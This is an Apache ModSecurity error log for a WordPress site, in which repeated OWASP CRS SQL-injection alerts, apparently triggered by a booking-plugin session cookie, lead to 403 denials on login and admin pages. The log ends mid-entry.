[Mon May 11 22:22:11.322208 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6c3o_DFxNSZVmaX3N7AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:11.876830 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6c3o_DFxNSZVmaX3N7AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:12.130194 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6dHo_DFxNSZVmaX3N7wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:12.130621 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6dHo_DFxNSZVmaX3N7wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:12.695064 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6dHo_DFxNSZVmaX3N7wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:12.929656 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6dHo_DFxNSZVmaX3N8AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:12.929983 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6dHo_DFxNSZVmaX3N8AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:13.306919 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6dHo_DFxNSZVmaX3N8AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:14.448956 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6dno_DFxNSZVmaX3N8wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:14.449277 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6dno_DFxNSZVmaX3N8wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:15.117332 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6dno_DFxNSZVmaX3N8wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:17.444956 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6eXo_DFxNSZVmaX3N-gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:17.445300 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6eXo_DFxNSZVmaX3N-gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:18.039827 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6eXo_DFxNSZVmaX3N-gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:18.658034 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6eno_DFxNSZVmaX3N_AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:18.658338 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6eno_DFxNSZVmaX3N_AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:19.299572 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6eno_DFxNSZVmaX3N_AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:19.739031 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6e3o_DFxNSZVmaX3N_QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:19.739335 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6e3o_DFxNSZVmaX3N_QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:20.279142 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6e3o_DFxNSZVmaX3N_QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:20.758903 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6fHo_DFxNSZVmaX3N_wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:20.759298 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6fHo_DFxNSZVmaX3N_wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:21.349919 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6fHo_DFxNSZVmaX3N_wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:21.548772 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6fXo_DFxNSZVmaX3OAQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:21.549093 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6fXo_DFxNSZVmaX3OAQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:21.910736 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6fXo_DFxNSZVmaX3OAQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:22.538998 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6fno_DFxNSZVmaX3OAgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:22.539392 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6fno_DFxNSZVmaX3OAgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:23.198730 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6fno_DFxNSZVmaX3OAgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:26.323708 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6gno_DFxNSZVmaX3OCQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:26.324002 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6gno_DFxNSZVmaX3OCQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:27.064826 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6gno_DFxNSZVmaX3OCQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:27.840378 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6g3o_DFxNSZVmaX3OEQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:27.840665 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6g3o_DFxNSZVmaX3OEQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:28.484224 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6g3o_DFxNSZVmaX3OEQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:30.689216 2026] [authz_core:error] [pid 1601130:tid 1601155] [client 216.73.216.110:30591] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/tests/Bridge/Symfony/error_log
[Mon May 11 22:22:31.148840 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6h3o_DFxNSZVmaX3OFAAAANE"], 